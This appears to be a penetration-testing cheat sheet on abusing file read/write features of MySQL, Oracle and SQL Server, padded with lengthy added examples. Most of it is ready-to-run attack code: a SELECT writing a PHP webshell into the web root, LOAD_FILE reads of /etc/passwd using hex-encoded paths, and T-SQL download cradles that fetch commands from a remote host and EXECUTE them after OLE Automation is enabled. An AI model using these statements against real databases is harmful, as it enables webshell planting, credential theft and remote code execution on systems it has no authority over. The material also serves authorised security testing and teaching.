Being able to read and write files from the database server aids information gathering: it can expose configuration and credential files, allows a webshell to be dropped into the web root, and lets data move over ports 80/443 that the web server already exposes.
MySQL

* Requires a privileged user (the global FILE privilege).
Description | Statement |
---|---|
Dump to file | `SELECT * FROM mytable INTO DUMPFILE '/tmp/somefile'` |
Write PHP shell to file | `SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/shell.php'` |
Read file | `SELECT LOAD_FILE('/etc/passwd')` |
Read file (path as hex literal, no quote characters needed) | `SELECT LOAD_FILE(0x633A5C626F6F742E696E69)` reads `c:\boot.ini` |
File privilege (mysql.user) | `SELECT file_priv FROM mysql.user WHERE user = 'netspi'` |
File privilege (information_schema) | `SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee LIKE '%netspi%'` |
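The following is an added example, not part of the original page, that strings the checks above together before attempting a write: it confirms FILE for the current account, checks the `secure_file_priv` setting (which since MySQL 5.7 limits where `INTO OUTFILE` and `LOAD_FILE` may touch), writes a marker file, and reads it back both with a quoted path and with the hex-literal form. The directory `/var/lib/mysql-files/` and the file name are assumptions (the package default on many Linux builds), not values from the page.

```sql
-- Added example (not from the original page). Assumptions: the connected account is the
-- one being tested, and /var/lib/mysql-files/ is the directory secure_file_priv permits
-- (a placeholder; substitute whatever step 2 returns).

-- 1. Does the current account hold FILE? FILE is a global privilege, so the grantee
--    appears as 'user'@'host' with no schema qualifier.
SELECT grantee, privilege_type, is_grantable
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE'
  AND grantee LIKE CONCAT('''', SUBSTRING_INDEX(CURRENT_USER(), '@', 1), '''@%');

-- 2. Where can INTO OUTFILE / LOAD_FILE reach?
--    ''            -> no restriction
--    NULL          -> file import/export disabled entirely (writes will fail)
--    '/some/dir/'  -> only inside that directory
SELECT @@secure_file_priv;

-- 3. Write into the permitted directory. INTO OUTFILE refuses to overwrite an existing
--    file and creates it as the mysqld OS user, so choose a fresh name.
SELECT 'marker written by sqli test' INTO OUTFILE '/var/lib/mysql-files/sqli_marker.txt';

-- 4. Read it back. LOAD_FILE returns NULL rather than an error when the file does not
--    exist, is unreadable by mysqld, lies outside secure_file_priv, exceeds
--    max_allowed_packet, or the account lacks FILE.
SELECT LOAD_FILE('/var/lib/mysql-files/sqli_marker.txt') AS marker;

-- 5. The same read with the path as a hex literal, which keeps quote characters out of an
--    injected payload. HEX() shows how the literal is produced; the constant below is
--    HEX('/var/lib/mysql-files/sqli_marker.txt').
SELECT HEX('/var/lib/mysql-files/sqli_marker.txt') AS path_as_hex;
SELECT LOAD_FILE(0x2F7661722F6C69622F6D7973716C2D66696C65732F73716C695F6D61726B65722E747874) AS marker_hex;
```

If step 4 returns NULL while step 3 succeeded, the usual cause is that the path in step 3 was outside `secure_file_priv` only on read, or that `max_allowed_packet` is smaller than the file; check those two before assuming FILE is missing.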
Oracle

UTL_FILE can sometimes be used. Check whether the following is non-null:

```sql
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
```

Note that the `utl_file_dir` parameter was deprecated in 12c and removed in 18c; on those releases UTL_FILE only works through directory objects (ALL_DIRECTORIES / DBA_DIRECTORIES), so an empty result here does not by itself rule the package out.

If Java is installed (not available in Oracle Express), it can be used to read and write files.
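As an added example (not code from the original page), here is the UTL_FILE path end to end: list the directory objects the session can see and the grants it holds on them, then write a file through one and read it back. The directory object name `DATA_PUMP_DIR` and the file name are assumptions; replace them with a directory from the first query on which you hold READ and WRITE.

```sql
-- Added example (not from the original page). Assumptions: the session holds READ and
-- WRITE on a directory object named DATA_PUMP_DIR (a placeholder), and SERVEROUTPUT is
-- on in SQL*Plus / SQLcl so DBMS_OUTPUT is visible.

-- 1. Legacy raw-path setting (12c and earlier only; removed in 18c).
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

-- 2. Directory objects visible to this session and the grants held directly on them.
--    Grants received through roles are not listed here; DBA_DIRECTORIES / DBA_TAB_PRIVS
--    show everything but need extra privileges.
SELECT d.directory_name, d.directory_path, p.privilege
FROM   all_directories d
JOIN   all_tab_privs p
  ON   p.table_name = d.directory_name AND p.table_schema = 'SYS'
WHERE  p.grantee IN (USER, 'PUBLIC');

-- 3. Write a marker file, then read it back line by line.
DECLARE
  v_dir  CONSTANT VARCHAR2(30) := 'DATA_PUMP_DIR';   -- assumption: usable directory object
  v_name CONSTANT VARCHAR2(30) := 'sqli_marker.txt';
  v_file UTL_FILE.FILE_TYPE;
  v_line VARCHAR2(4000);
BEGIN
  -- 'w' truncates/creates, 'a' appends; the OS-level write happens as the oracle user.
  v_file := UTL_FILE.FOPEN(v_dir, v_name, 'w');
  UTL_FILE.PUT_LINE(v_file, 'marker written through UTL_FILE');
  UTL_FILE.FCLOSE(v_file);

  -- GET_LINE raises NO_DATA_FOUND at end of file, so loop until that exception.
  v_file := UTL_FILE.FOPEN(v_dir, v_name, 'r');
  BEGIN
    LOOP
      UTL_FILE.GET_LINE(v_file, v_line);
      DBMS_OUTPUT.PUT_LINE(v_line);
    END LOOP;
  EXCEPTION
    WHEN NO_DATA_FOUND THEN NULL;
  END;
  UTL_FILE.FCLOSE(v_file);
EXCEPTION
  WHEN UTL_FILE.INVALID_PATH THEN
    DBMS_OUTPUT.PUT_LINE('directory object missing or not usable: ' || v_dir);
  WHEN UTL_FILE.INVALID_OPERATION THEN
    DBMS_OUTPUT.PUT_LINE('no READ/WRITE grant on ' || v_dir || ' or OS permission denied');
  WHEN UTL_FILE.ACCESS_DENIED THEN
    DBMS_OUTPUT.PUT_LINE('access denied on ' || v_dir || '/' || v_name);
END;
/
```

UTL_FILE can only touch paths that some directory object maps to; an account with CREATE ANY DIRECTORY can point a new directory object at any path the oracle OS user can reach (for example `/etc`) and then read it the same way, which is why that privilege should be treated as file-system access.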
SQL Server

* Requires a privileged user. BULK INSERT and OPENROWSET(BULK ...) need the ADMINISTER BULK OPERATIONS permission; the OLE Automation procedures (sp_OACreate and friends) require membership in the sysadmin role and the 'Ole Automation Procedures' option enabled via sp_configure, which is off by default.
Description | Statement |
---|---|
Download cradle – Bulk Insert – TSQL | see block below |
Download cradle – OLE Automation Procedure, option 1 – TSQL | see block below (no table needed, small payloads only) |
Download cradle – OLE Automation Procedure, option 2 – TSQL | see block below (handles larger payloads, needs a temp table) |
Read file – TSQL | PowerUpSQL templates, listed below |
Write file – TSQL | PowerUpSQL templates, listed below |

Download cradle – Bulk Insert – TSQL:

```sql
-- Bulk Insert - Download Cradle Example
-- Setup variables
DECLARE @cmd varchar(8000)
-- Create temp table
CREATE TABLE #file (content nvarchar(4000));
-- Read file into temp table - the web server must support PROPFIND (WebDAV)
BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';
-- Select contents of file
SELECT @cmd = content FROM #file
-- Display command
SELECT @cmd
-- Run command
EXECUTE(@cmd)
-- Drop the temp table
DROP TABLE #file
```

Download cradle – OLE Automation Procedure, option 1 – TSQL:

```sql
-- OLE Automation Procedure - Download Cradle Example
-- Does not require a table, but can't handle larger payloads
-- Note: this also works with UNC paths: \\ip\file.txt
-- Note: this also works with WebDAV paths: \\ip@80\file.txt
--       (the target web server needs to support PROPFIND)
-- Setup variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @handle int
DECLARE @Command varchar(8000)
-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'
-- Create the WinHttpRequest COM object
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT
-- Call the Open method to set up the HTTP request
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'
-- Call the Send method to send the HTTP GET request
EXEC @handle=sp_OAMethod @WinHTTP,'Send'
-- Capture the HTTP response content
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out
-- Destroy the object
EXEC @handle=sp_OADestroy @WinHTTP
-- Display command
SELECT @Command
-- Run command
EXECUTE (@Command)
```

Download cradle – OLE Automation Procedure, option 2 – TSQL:

```sql
-- OLE Automation Procedure - Download Cradle Example - Option 2
-- Can handle larger payloads, but requires a table
-- Note: this also works with UNC paths: \\ip\file.txt
-- Note: this also works with WebDAV paths: \\ip@80\file.txt
--       (the target web server needs to support PROPFIND)
-- Setup variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @Handle int
DECLARE @Command varchar(8000)
-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'
-- Create temp table to store the downloaded string
CREATE TABLE #text(html text NULL)
-- Create the WinHttpRequest COM object
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT
-- Call the Open method to configure the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'
-- Call the Send method to send the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'
-- Capture the HTTP response content into the table
INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'
-- Destroy the object
EXEC @Handle=sp_OADestroy @WinHTTP
-- Display the command
SELECT @Command = html FROM #text
SELECT @Command
-- Run the command
EXECUTE (@Command)
-- Remove temp table
DROP TABLE #text
```

Read file – TSQL (PowerUpSQL templates):

- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql

Write file – TSQL (PowerUpSQL templates):

- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql
- https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql
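The cradles above assume their prerequisites are already in place. As an added example (not code from the page or from PowerUpSQL), the block below checks those prerequisites, reads a file in one shot with OPENROWSET(BULK ..., SINGLE_CLOB), and writes a file with the Scripting.FileSystemObject COM class through the same OLE Automation procedures the cradles use. The login being sysadmin, `C:\Windows\win.ini` as a readable file and `C:\inetpub\wwwroot` as a writable web root are assumptions.

```sql
-- Added example (not from the original page). Assumptions: the login is sysadmin
-- (required by sp_OACreate and to change the option); C:\Windows\win.ini and
-- C:\inetpub\wwwroot\marker.txt are placeholders for a readable file and a writable
-- path on the SQL Server host. The service account, not the login, performs the I/O.

-- 1. Prerequisites: role membership, bulk permission, and the relevant server options.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') AS can_bulk;
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('Ole Automation Procedures', 'xp_cmdshell', 'show advanced options');

-- Enable OLE Automation if value_in_use is 0. This needs sysadmin and the change is
-- written to the SQL Server error log, so expect it to be visible to defenders.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;

-- 2. Read a file as a single blob. No temp table is needed; the SQL Server service
--    account must have NTFS read access to the path.
SELECT BulkColumn AS file_contents
FROM   OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS f;

-- 3. Write a file with Scripting.FileSystemObject. Each sp_OA* call returns an HRESULT;
--    anything non-zero is an error, and sp_OAGetErrorInfo explains it.
DECLARE @fso int, @file int, @hr int
DECLARE @path varchar(260) = 'C:\inetpub\wwwroot\marker.txt'
DECLARE @text varchar(8000) = 'marker written via sp_OACreate'

EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUT
IF @hr <> 0 BEGIN EXEC sp_OAGetErrorInfo @fso; RETURN; END      -- option disabled or not sysadmin

-- CreateTextFile(filename, overwrite) returns a TextStream object token in @file
EXEC @hr = sp_OAMethod @fso, 'CreateTextFile', @file OUT, @path, 1
IF @hr <> 0 BEGIN EXEC sp_OAGetErrorInfo @fso; RETURN; END      -- NTFS denies the service account

EXEC @hr = sp_OAMethod @file, 'WriteLine', NULL, @text
EXEC @hr = sp_OAMethod @file, 'Close'
EXEC sp_OADestroy @file
EXEC sp_OADestroy @fso

-- 4. Verify by reading the new file back with the technique from step 2.
SELECT BulkColumn AS marker
FROM   OPENROWSET(BULK 'C:\inetpub\wwwroot\marker.txt', SINGLE_CLOB) AS f;
```

OPENROWSET(BULK ...) reads with the service account's token, so a file the login could never open may still be readable here, and conversely a path the login can see may be denied; when step 2 fails with an access error, that is the permission to look at.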
Article last updated on 2021-09-22